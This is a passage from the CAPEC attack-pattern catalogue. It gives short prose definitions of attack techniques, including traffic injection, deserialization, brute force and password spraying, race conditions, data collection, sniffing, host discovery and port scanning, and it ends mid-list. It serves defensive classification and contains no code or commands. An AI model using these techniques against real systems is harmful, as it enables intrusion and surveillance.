1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 594 (Traffic Injection) > 595 (Connection Reset) > 596 (TCP RST Injection)

An adversary injects one or more TCP RST packets to a target after the target has made a HTTP GET request. The goal of this attack is to have the target and/or destination web server terminate the TCP connection.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 586 (Object Injection)

An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.

1000 (Mechanisms of Attack) > 223 (Employ Probabilistic Techniques)

An attacker utilizes probabilistic techniques to explore and overcome security properties of the target that are based on an assumption of strength due to the extremely low mathematical probability that an attacker would be able to identify and exploit the very rare specific conditions under which those security properties do not hold.

1000 (Mechanisms of Attack) > 223 (Employ Probabilistic Techniques) > 112 (Brute Force)

In this attack, some asset (information, functionality, identity, etc.) is protected by a finite secret value. The attacker attempts to gain access to this asset by using trial-and-error to exhaustively explore all the possible secret values in the hope of finding the secret (or a value that is functionally equivalent) that will unlock the asset.

1000 (Mechanisms of Attack) > 223 (Employ Probabilistic Techniques) > 112 (Brute Force) > 20 (Encryption Brute Forcing)

An attacker, armed with the cipher text and the encryption algorithm used, performs an exhaustive (brute force) search on the key space to determine the key that decrypts the cipher text to obtain the plaintext.

1000 (Mechanisms of Attack) > 223 (Employ Probabilistic Techniques) > 112 (Brute Force) > 49 (Password Brute Forcing)

An adversary tries every possible value for a password until they succeed. A brute force attack, if feasible computationally, will always be successful because it will essentially go through all possible passwords given the alphabet used (lower case letters, upper case letters, numbers, symbols, etc.) and the maximum length of the password.

1000 (Mechanisms of Attack) > 223 (Employ Probabilistic Techniques) > 112 (Brute Force) > 49 (Password Brute Forcing) > 16 (Dictionary-based Password Attack)

An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user's account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern. Dictionary Attacks differ from similar attacks such as Password Spraying (CAPEC-565) and Credential Stuffing (CAPEC-600), since they leverage unknown username/password combinations and don't care about inducing account lockouts.

1000 (Mechanisms of Attack) > 223 (Employ Probabilistic Techniques) > 112 (Brute Force) > 49 (Password Brute Forcing) > 55 (Rainbow Table Password Cracking)

An attacker gets access to the database table where hashes of passwords are stored. They then use a rainbow table of pre-computed hash chains to attempt to look up the original password. Once the original password corresponding to the hash is obtained, the attacker uses the original password to gain access to the system.

1000 (Mechanisms of Attack) > 223 (Employ Probabilistic Techniques) > 112 (Brute Force) > 49 (Password Brute Forcing) > 565 (Password Spraying)

In a Password Spraying attack, an adversary tries a small list (e.g. 3-5) of common or expected passwords, often matching the target's complexity policy, against a known list of user accounts to gain valid credentials. The adversary tries a particular password for each user account, before moving onto the next password in the list. This approach assists the adversary in remaining undetected by avoiding rapid or frequent account lockouts. The adversary may then reattempt the process with additional passwords, once enough time has passed to prevent inducing a lockout.

1000 (Mechanisms of Attack) > 223 (Employ Probabilistic Techniques) > 112 (Brute Force) > 49 (Password Brute Forcing) > 70 (Try Common or Default Usernames and Passwords)

An adversary may try certain common or default usernames and passwords to gain access into the system and perform unauthorized actions. An adversary may try an intelligent brute force using empty passwords, known vendor default credentials, as well as a dictionary of common usernames and passwords. Many vendor products come preconfigured with default (and thus well-known) usernames and passwords that should be deleted prior to usage in a production environment. It is a common mistake to forget to remove these default login credentials. Another problem is that users would pick very simple (common) passwords (e.g. "secret" or "password") that make it easier for the attacker to gain access to the system compared to using a brute force attack or even a dictionary attack using a full dictionary.

1000 (Mechanisms of Attack) > 223 (Employ Probabilistic Techniques) > 28 (Fuzzing)

In this attack pattern, the adversary leverages fuzzing to try to identify weaknesses in the system. Fuzzing is a software security and functionality testing method that feeds randomly constructed input to the system and looks for an indication that a failure in response to that input has occurred. Fuzzing treats the system as a black box and is totally free from any preconceptions or assumptions about the system. Fuzzing can help an attacker discover certain assumptions made about user input in the system. Fuzzing gives an attacker a quick way of potentially uncovering some of these assumptions despite not necessarily knowing anything about the internals of the system. These assumptions can then be turned against the system by specially crafting user input that may allow an attacker to achieve their goals.

1000 (Mechanisms of Attack) > 223 (Employ Probabilistic Techniques) > 28 (Fuzzing) > 215 (Fuzzing for application mapping)

An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes the application's log or error messages returned. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger's desired behavior. In this attack, the purpose of the fuzzing is to observe the application's log and error messages, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash.

1000 (Mechanisms of Attack) > 172 (Manipulate Timing and State)

An attacker exploits weaknesses in timing or state maintaining functions to perform actions that would otherwise be prevented by the execution flow of the target code and processes. An example of a state attack might include manipulation of an application's information to change the apparent credentials or similar information, possibly allowing the application to access material it would not normally be allowed to access. A common example of a timing attack is a test-action race condition where some state information is tested and, if it passes, an action is performed. If the attacker can change the state between the time that the application performs the test and the time the action is performed, then they might be able to manipulate the outcome of the action to malicious ends.

1000 (Mechanisms of Attack) > 172 (Manipulate Timing and State) > 25 (Forced Deadlock)

The adversary triggers and exploits a deadlock condition in the target software to cause a denial of service. A deadlock can occur when two or more competing actions are waiting for each other to finish, and thus neither ever does. Deadlock conditions can be difficult to detect.

1000 (Mechanisms of Attack) > 172 (Manipulate Timing and State) > 26 (Leveraging Race Conditions)

The adversary targets a race condition occurring when multiple processes access and manipulate the same resource concurrently, and the outcome of the execution depends on the particular order in which the access takes place. The adversary can leverage a race condition by "running the race", modifying the resource and modifying the normal execution flow. For instance, a race condition can occur while accessing a file: the adversary can trick the system by replacing the original file with their version and cause the system to read the malicious file.

1000 (Mechanisms of Attack) > 172 (Manipulate Timing and State) > 26 (Leveraging Race Conditions) > 29 (Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions)

This attack targets a race condition occurring between the time of check (state) for a resource and the time of use of a resource. A typical example is file access. The adversary can leverage a file access race condition by "running the race", meaning that they would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the adversary could replace or modify the file, causing the application to behave unexpectedly.

1000 (Mechanisms of Attack) > 172 (Manipulate Timing and State) > 26 (Leveraging Race Conditions) > 29 (Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions) > 27 (Leveraging Race Conditions via Symbolic Links)

This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to them. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers' Symlink link. If the attacker can insert malicious content in the temporary file they will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file.

1000 (Mechanisms of Attack) > 172 (Manipulate Timing and State) > 74 (Manipulating State)

The adversary modifies state information maintained by the target software or causes a state transition in hardware. If successful, the target will use this tainted state and execute in an unintended manner. State management is an important function within a software application. User state maintained by the application can include usernames, payment information, browsing history as well as application-specific contents such as items in a shopping cart. Manipulating user state can be employed by an adversary to elevate privilege, conduct fraudulent transactions or otherwise modify the flow of the application to derive certain benefits. If there is a hardware logic error in a finite state machine, the adversary can use this to put the system in an undefined state which could cause a denial of service or exposure of secure data.

1000 (Mechanisms of Attack) > 172 (Manipulate Timing and State) > 74 (Manipulating State) > 140 (Bypassing of Intermediate Forms in Multiple-Form Sets)

Some web applications require users to submit information through an ordered sequence of web forms. This is often done if there is a very large amount of information being collected or if information on earlier forms is used to pre-populate fields or determine which additional information the application needs to collect. An attacker who knows the names of the various forms in the sequence may be able to explicitly type in the name of a later form and navigate to it without first going through the previous forms. This can result in incomplete collection of information, incorrect assumptions about the information submitted by the attacker, or other problems that can impair the functioning of the application.

1000 (Mechanisms of Attack) > 172 (Manipulate Timing and State) > 74 (Manipulating State) > 663 (Exploitation of Transient Instruction Execution)

1000 (Mechanisms of Attack) > 172 (Manipulate Timing and State) > 74 (Manipulating State) > 663 (Exploitation of Transient Instruction Execution) > 696 (Load Value Injection)

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information)

Attack patterns within this category focus on the gathering, collection, and theft of information by an adversary. The adversary may collect this information through a variety of methods including active querying as well as passive observation. By exploiting weaknesses in the design or configuration of the target and its communications, an adversary is able to get the target to reveal more information than intended. Information retrieved may aid the adversary in making inferences about potential weaknesses, vulnerabilities, or techniques that assist the adversary's objectives. This information may include details regarding the configuration or capabilities of the target, clues as to the timing or nature of activities, or otherwise sensitive information. Often this sort of attack is undertaken in preparation for some other type of attack, although the collection of information by itself may in some cases be the end goal of the adversary.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation)

An adversary actively probes the target in a manner that is designed to solicit information that could be leveraged for malicious purposes.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 150 (Collect Data from Common Resource Locations)

An adversary exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most systems, files and resources are organized in a default tree structure. This can be useful for adversaries because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may not be known, naming conventions may indicate a small area of the target machine's file tree where the resources are typically located. For example, configuration files are normally stored in the /etc director on Unix systems. Adversaries can take advantage of this to commit other types of attacks.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 150 (Collect Data from Common Resource Locations) > 143 (Detect Unpublicized Web Pages)

An adversary searches a targeted web site for web pages that have not been publicized. In doing this, the adversary may be able to gain access to information that the targeted site did not intend to make public.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 150 (Collect Data from Common Resource Locations) > 144 (Detect Unpublicized Web Services)

An adversary searches a targeted web site for web services that have not been publicized. This attack can be especially dangerous since unpublished but available services may not have adequate security controls placed upon them given that an administrator may believe they are unreachable.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 150 (Collect Data from Common Resource Locations) > 155 (Screen Temporary Files for Sensitive Information)

An adversary exploits the temporary, insecure storage of information by monitoring the content of files used to store temp data during an application's routine execution flow. Many applications use temporary files to accelerate processing or to provide records of state across multiple executions of the application. Sometimes, however, these temporary files may end up storing sensitive information. By screening an application's temporary files, an adversary might be able to discover such sensitive information. For example, web browsers often cache content to accelerate subsequent lookups. If the content contains sensitive information then the adversary could recover this from the web cache.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 150 (Collect Data from Common Resource Locations) > 406 (Dumpster Diving)

An adversary cases an establishment and searches through trash bins, dumpsters, or areas where company information may have been accidentally discarded for information items which may be useful to the dumpster diver. The devastating nature of the items and/or information found can be anything from medical records, resumes, personal photos and emails, bank statements, account details or information about software, tech support logs and so much more, including hardware devices. By collecting this information an adversary may be able to learn important facts about the person or organization that play a role in helping the adversary in their attack.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 150 (Collect Data from Common Resource Locations) > 637 (Collect Data from Clipboard)

The adversary exploits an application that allows for the copying of sensitive data or information by collecting information copied to the clipboard. Data copied to the clipboard can be accessed by other applications, such as malware built to exfiltrate or log clipboard contents on a periodic basis. In this way, the adversary aims to garner information to which they are unauthorized.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 150 (Collect Data from Common Resource Locations) > 647 (Collect Data from Registries)

An adversary exploits a weakness in authorization to gather system-specific data and sensitive information within a registry (e.g., Windows Registry, Mac plist). These contain information about the system configuration, software, operating system, and security. The adversary can leverage information gathered in order to carry out further attacks.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 150 (Collect Data from Common Resource Locations) > 648 (Collect Data from Screen Capture)

An adversary gathers sensitive information by exploiting the system's screen capture functionality. Through screenshots, the adversary aims to see what happens on the screen over the course of an operation. The adversary can leverage information gathered in order to carry out further attacks.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 54 (Query System for Information)

An adversary, aware of an application's location (and possibly authorized to use the application), probes an application's structure and evaluates its robustness by submitting requests and examining responses. Often, this is accomplished by sending variants of expected queries in the hope that these modified queries might return information beyond what the expected set of queries would provide.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 54 (Query System for Information) > 127 (Directory Indexing)

An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 54 (Query System for Information) > 215 (Fuzzing for application mapping)

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 54 (Query System for Information) > 261 (Fuzzing for garnering other adjacent user/sensitive data)

An adversary who is authorized to send queries to a target sends variants of expected queries in the hope that these modified queries might return information (directly or indirectly through error logs) beyond what the expected set of queries should provide.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 54 (Query System for Information) > 462 (Cross-Domain Search Timing)

An attacker initiates cross domain HTTP / GET requests and times the server responses. The timing of these responses may leak important information on what is happening on the server. Browser's same origin policy prevents the attacker from directly reading the server responses (in the absence of any other weaknesses), but does not prevent the attacker from timing the responses to requests that the attacker issued cross domain.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 54 (Query System for Information) > 95 (WSDL Scanning)

This attack targets the WSDL interface made available by a web service. The attacker may scan the WSDL interface to reveal sensitive information about invocation patterns, underlying technology implementations and associated vulnerabilities. This type of probing is carried out to perform more serious attacks (e.g. parameter tampering, malicious content injection, command injection, etc.). WSDL files provide detailed information about the services ports and bindings available to consumers. For instance, the attacker can submit special characters or malicious content to the Web service and can cause a denial of service condition or illegal access to database records. In addition, the attacker may try to guess other private methods by using the information provided in the WSDL files.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 545 (Pull Data from System Resources)

An adversary who is authorized or has the ability to search known system resources, does so with the intention of gathering useful information. System resources include files, memory, and other aspects of the target system. In this pattern of attack, the adversary does not necessarily know what they are going to find when they start pulling data. This is different than CAPEC-150 where the adversary knows what they are looking for due to the common location.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 545 (Pull Data from System Resources) > 498 (Probe iOS Screenshots)

An adversary examines screenshot images created by iOS in an attempt to obtain sensitive information. This attack targets temporary screenshots created by the underlying OS while the application remains open in the background.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 545 (Pull Data from System Resources) > 546 (Incomplete Data Deletion in a Multi-Tenant Environment)

An adversary obtains unauthorized information due to insecure or incomplete data deletion in a multi-tenant environment. If a cloud provider fails to completely delete storage and data from former cloud tenants' systems/resources, once these resources are allocated to new, potentially malicious tenants, the latter can probe the provided resources for sensitive information still there.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 545 (Pull Data from System Resources) > 634 (Probe Audio and Video Peripherals)

The adversary exploits the target system's audio and video functionalities through malware or scheduled tasks. The goal is to capture sensitive information about the target for financial, personal, political, or other gains which is accomplished by collecting communication data between two parties via the use of peripheral devices (e.g. microphones and webcams) or applications with audio and video capabilities (e.g. Skype) on a system.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 545 (Pull Data from System Resources) > 639 (Probe System Files)

An adversary obtains unauthorized information due to improperly protected files. If an application stores sensitive information in a file that is not protected by proper access control, then an adversary can access the file and search for sensitive information.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 569 (Collect Data as Provided by Users)

An attacker leverages a tool, device, or program to obtain specific information as provided by a user of the target system. This information is often needed by the attacker to launch a follow-on attack. This attack is different than Social Engineering as the adversary is not tricking or deceiving the user. Instead the adversary is putting a mechanism in place that captures the information that a user legitimately enters into a system. Deploying a keylogger, performing a UAC prompt, or wrapping the Windows default credential provider are all examples of such interactions.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 569 (Collect Data as Provided by Users) > 568 (Capture Credentials via Keylogger)

An adversary deploys a keylogger in an effort to obtain credentials directly from a system's user. After capturing all the keystrokes made by a user, the adversary can analyze the data and determine which string are likely to be passwords or other credential related information.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 116 (Excavation) > 675 (Retrieve Data from Decommissioned Devices)

An adversary obtains decommissioned, recycled, or discarded systems and devices that can include an organization’s intellectual property, employee data, and other types of controlled information. Systems and devices that have reached the end of their lifecycles may be subject to recycle or disposal where they can be exposed to adversarial attempts to retrieve information from internal memory chips and storage devices that are part of the system.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 117 (Interception)

An adversary monitors data streams to or from the target for information gathering purposes. This attack may be undertaken to solely gather sensitive information or to support a further attack against the target. This attack pattern can involve sniffing network traffic as well as other types of data streams (e.g. radio). The adversary can attempt to initiate the establishment of a data stream or passively observe the communications as they unfold. In all variants of this attack, the adversary is not the intended recipient of the data stream. In contrast to other means of gathering information (e.g., targeting data leaks), the adversary must actively position themself so as to observe explicit data channels (e.g. network traffic) and read the content. However, this attack differs from a Adversary-In-the-Middle (CAPEC-94) attack, as the adversary does not alter the content of the communications nor forward data to the intended recipient.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 117 (Interception) > 157 (Sniffing Attacks)

In this attack pattern, the adversary intercepts information transmitted between two third parties. The adversary must be able to observe, read, and/or hear the communication traffic, but not necessarily block the communication or change its content. Any transmission medium can theoretically be sniffed if the adversary can examine the contents between the sender and recipient. Sniffing Attacks are similar to Adversary-In-The-Middle attacks (CAPEC-94), but are entirely passive. AiTM attacks are predominantly active and often alter the content of the communications themselves.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 117 (Interception) > 157 (Sniffing Attacks) > 158 (Sniffing Network Traffic)

In this attack pattern, the adversary monitors network traffic between nodes of a public or multicast network in an attempt to capture sensitive information at the protocol level. Network sniffing applications can reveal TCP/IP, DNS, Ethernet, and other low-level network communication information. The adversary takes a passive role in this attack pattern and simply observes and analyzes the traffic. The adversary may precipitate or indirectly influence the content of the observed transaction, but is never the intended recipient of the target information.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 117 (Interception) > 157 (Sniffing Attacks) > 31 (Accessing/Intercepting/Modifying HTTP Cookies)

This attack relies on the use of HTTP Cookies to store credentials, state information and other critical data on client systems. There are several different forms of this attack. The first form of this attack involves accessing HTTP Cookies to mine for potentially sensitive data contained therein. The second form involves intercepting this data as it is transmitted from client to server. This intercepted information is then used by the adversary to impersonate the remote user/session. The third form is when the cookie's content is modified by the adversary before it is sent back to the server. Here the adversary seeks to convince the target server to operate on this falsified information.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 117 (Interception) > 157 (Sniffing Attacks) > 57 (Utilizing REST's Trust in the System Resource to Obtain Sensitive Data)

This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to obtain sensitive data once SSL is terminated.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 117 (Interception) > 157 (Sniffing Attacks) > 609 (Cellular Traffic Intercept)

Cellular traffic for voice and data from mobile devices and retransmission devices can be intercepted via numerous methods. Malicious actors can deploy their own cellular tower equipment and intercept cellular traffic surreptitiously. Additionally, government agencies of adversaries and malicious actors can intercept cellular traffic via the telecommunications backbone over which mobile traffic is transmitted.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 117 (Interception) > 157 (Sniffing Attacks) > 65 (Sniff Application Code)

An adversary passively sniffs network communications and captures application code bound for an authorized client. Once obtained, they can use it as-is, or through reverse-engineering glean sensitive information or exploit the trust relationship between the client and server. Such code may belong to a dynamic update to the client, a patch being applied to a client component or any such interaction where the client is authorized to communicate with the server.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 117 (Interception) > 499 (Android Intent Intercept)

An adversary, through a previously installed malicious application, intercepts messages from a trusted Android-based application in an attempt to achieve a variety of different objectives including denial of service, information disclosure, and data injection. An implicit intent sent from a trusted application can be received by any application that has declared an appropriate intent filter. If the intent is not protected by a permission that the malicious application lacks, then the attacker can gain access to the data contained within the intent. Further, the intent can be either blocked from reaching the intended destination, or modified and potentially forwarded along.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 117 (Interception) > 499 (Android Intent Intercept) > 501 (Android Activity Hijack)

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 117 (Interception) > 651 (Eavesdropping)

An adversary intercepts a form of communication (e.g. text, audio, video) by way of software (e.g., microphone and audio recording application), hardware (e.g., recording equipment), or physical means (e.g., physical proximity). The goal of eavesdropping is typically to gain unauthorized access to sensitive information about the target for financial, personal, political, or other gains. Eavesdropping is different from a sniffing attack as it does not take place on a network-based communication channel (e.g., IP traffic). Instead, it entails listening in on the raw audio source of a conversation between two or more parties.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 117 (Interception) > 651 (Eavesdropping) > 508 (Shoulder Surfing)

In a shoulder surfing attack, an adversary observes an unaware individual's keystrokes, screen content, or conversations with the goal of obtaining sensitive information. One motive for this attack is to obtain sensitive information about the target for financial, personal, political, or other gains. From an insider threat perspective, an additional motive could be to obtain system/application credentials or cryptographic keys. Shoulder surfing attacks are accomplished by observing the content "over the victim's shoulder", as implied by the name of this attack.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 117 (Interception) > 651 (Eavesdropping) > 634 (Probe Audio and Video Peripherals)

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 117 (Interception) > 651 (Eavesdropping) > 699 (Eavesdropping on a Monitor)

An Adversary can eavesdrop on the content of an external monitor through the air without modifying any cable or installing software, just capturing this signal emitted by the cable or video port, with this the attacker will be able to impact the confidentiality of the data without being detected by traditional security tools

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting)

An adversary engages in probing and exploration activities to identify constituents and properties of the target.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 292 (Host Discovery)

An adversary sends a probe to an IP address to determine if the host is alive. Host discovery is one of the earliest phases of network reconnaissance. The adversary usually starts with a range of IP addresses belonging to a target network and uses various methods to determine if a host is present at that IP address. Host discovery is usually referred to as 'Ping' scanning using a sonar analogy. The goal is to send a packet through to the IP address and solicit a response from the host. As such, a 'ping' can be virtually any crafted packet whatsoever, provided the adversary can identify a functional host based on its response. An attack of this nature is usually carried out with a 'ping sweep,' where a particular kind of ping is sent to a range of IP addresses.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 292 (Host Discovery) > 285 (ICMP Echo Request Ping)

An adversary sends out an ICMP Type 8 Echo Request, commonly known as a 'Ping', in order to determine if a target system is responsive. If the request is not blocked by a firewall or ACL, the target host will respond with an ICMP Type 0 Echo Reply datagram. This type of exchange is usually referred to as a 'Ping' due to the Ping utility present in almost all operating systems. Ping, as commonly implemented, allows a user to test for alive hosts, measure round-trip time, and measure the percentage of packet loss.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 292 (Host Discovery) > 294 (ICMP Address Mask Request)

An adversary sends an ICMP Type 17 Address Mask Request to gather information about a target's networking configuration. ICMP Address Mask Requests are defined by RFC-950, "Internet Standard Subnetting Procedure." An Address Mask Request is an ICMP type 17 message that triggers a remote system to respond with a list of its related subnets, as well as its default gateway and broadcast address via an ICMP type 18 Address Mask Reply datagram. Gathering this type of information helps the adversary plan router-based attacks as well as denial-of-service attacks against the broadcast address.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 292 (Host Discovery) > 295 (Timestamp Request)

This pattern of attack leverages standard requests to learn the exact time associated with a target system. An adversary may be able to use the timestamp returned from the target to attack time-based security algorithms, such as random number generators, or time-based authentication mechanisms.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 292 (Host Discovery) > 296 (ICMP Information Request)

An adversary sends an ICMP Information Request to a host to determine if it will respond to this deprecated mechanism. ICMP Information Requests are a deprecated message type. Information Requests were originally used for diskless machines to automatically obtain their network configuration, but this message type has been superseded by more robust protocol implementations like DHCP.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 292 (Host Discovery) > 297 (TCP ACK Ping)

An adversary sends a TCP segment with the ACK flag set to a remote host for the purpose of determining if the host is alive. This is one of several TCP 'ping' types. The RFC 793 expected behavior for a service is to respond with a RST 'reset' packet to any unsolicited ACK segment that is not part of an existing connection. So by sending an ACK segment to a port, the adversary can identify that the host is alive by looking for a RST packet. Typically, a remote server will respond with a RST regardless of whether a port is open or closed. In this way, TCP ACK pings cannot discover the state of a remote port because the behavior is the same in either case. The firewall will look up the ACK packet in its state-table and discard the segment because it does not correspond to any active connection. A TCP ACK Ping can be used to discover if a host is alive via RST response packets sent from the host.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 292 (Host Discovery) > 298 (UDP Ping)

An adversary sends a UDP datagram to the remote host to determine if the host is alive. If a UDP datagram is sent to an open UDP port there is very often no response, so a typical strategy for using a UDP ping is to send the datagram to a random high port on the target. The goal is to solicit an 'ICMP port unreachable' message from the target, indicating that the host is alive. UDP pings are useful because some firewalls are not configured to block UDP datagrams sent to strange or typically unused ports, like ports in the 65K range. Additionally, while some firewalls may filter incoming ICMP, weaknesses in firewall rule-sets may allow certain types of ICMP (host unreachable, port unreachable) which are useful for UDP ping attempts.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 292 (Host Discovery) > 299 (TCP SYN Ping)

An adversary uses TCP SYN packets as a means towards host discovery. Typical RFC 793 behavior specifies that when a TCP port is open, a host must respond to an incoming SYN "synchronize" packet by completing stage two of the 'three-way handshake' - by sending an SYN/ACK in response. When a port is closed, RFC 793 behavior is to respond with a RST "reset" packet. This behavior can be used to 'ping' a target to see if it is alive by sending a TCP SYN packet to a port and then looking for a RST or an ACK packet in response.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 292 (Host Discovery) > 612 (WiFi MAC Address Tracking)

In this attack scenario, the attacker passively listens for WiFi messages and logs the associated Media Access Control (MAC) addresses. These addresses are intended to be unique to each wireless device (although they can be configured and changed by software). Once the attacker is able to associate a MAC address with a particular user or set of users (for example, when attending a public event), the attacker can then scan for that MAC address to track that user in the future.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 292 (Host Discovery) > 613 (WiFi SSID Tracking)

In this attack scenario, the attacker passively listens for WiFi management frame messages containing the Service Set Identifier (SSID) for the WiFi network. These messages are frequently transmitted by WiFi access points (e.g., the retransmission device) as well as by clients that are accessing the network (e.g., the handset/mobile device). Once the attacker is able to associate an SSID with a particular user or set of users (for example, when attending a public event), the attacker can then scan for this SSID to track that user in the future.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 292 (Host Discovery) > 618 (Cellular Broadcast Message Request)

In this attack scenario, the attacker uses knowledge of the target’s mobile phone number (i.e., the number associated with the SIM used in the retransmission device) to cause the cellular network to send broadcast messages to alert the mobile device. Since the network knows which cell tower the target’s mobile device is attached to, the broadcast messages are only sent in the Location Area Code (LAC) where the target is currently located. By triggering the cellular broadcast message and then listening for the presence or absence of that message, an attacker could verify that the target is in (or not in) a given location.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 292 (Host Discovery) > 619 (Signal Strength Tracking)

In this attack scenario, the attacker passively monitors the signal strength of the target’s cellular RF signal or WiFi RF signal and uses the strength of the signal (with directional antennas and/or from multiple listening points at once) to identify the source location of the signal. Obtaining the signal of the target can be accomplished through multiple techniques such as through Cellular Broadcast Message Request or through the use of IMSI Tracking or WiFi MAC Address Tracking.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 300 (Port Scanning)

An adversary uses a combination of techniques to determine the state of the ports on a remote target. Any service or application available for TCP or UDP networking will have a port open for communications over the network.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 300 (Port Scanning) > 287 (TCP SYN Scan)

An adversary uses a SYN scan to determine the status of ports on the remote target. SYN scanning is the most common type of port scanning that is used because of its many advantages and few drawbacks. As a result, novice attackers tend to overly rely on the SYN scan while performing system reconnaissance. As a scanning method, the primary advantages of SYN scanning are its universality and speed.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 300 (Port Scanning) > 301 (TCP Connect Scan)

An adversary uses full TCP connection attempts to determine if a port is open on the target system. The scanning process involves completing a 'three-way handshake' with a remote port, and reports the port as closed if the full handshake cannot be established. An advantage of TCP connect scanning is that it works against any TCP/IP stack.

1000 (Mechanisms of Attack) > 118 (Collect and Analyze Information) > 169 (Footprinting) > 300 (Port Scanning) > 302 (TCP FIN Scan)

